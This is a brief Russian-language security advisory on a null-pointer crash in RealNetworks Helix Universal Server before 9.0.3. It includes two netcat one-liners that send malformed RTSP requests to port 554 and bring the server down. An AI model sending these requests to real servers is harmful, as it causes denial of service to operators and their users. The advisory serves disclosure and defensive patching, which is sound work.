Программа: RealNetworks Helix Universal Server до версии 9.0.3 

Уязвимость обнаружена в RealNetworks Helix Universal Server. Удаленный пользователь может аварийно завершить работу службы.
Удаленный пользователь может представить специально обработанный HTTP GET запрос, чтобы вызвать ссылку на нулевой указатель, чтобы аварийно завершить работу сервера. Пример: 

$ echo -e «GET_PARAMETER / RTSP/1.0\n\n» | nc -v localhost 554
$ echo -e «DESCRIBE / RTSP/1.0\nSession:\n\n» | nc -v localhost 554

Если установлены опции ‘—no-crash-avoidance’ и ‘—no-auto-restart’, сервер аварийно завершит свою работу и не будет перезагружен.



Оставить мнение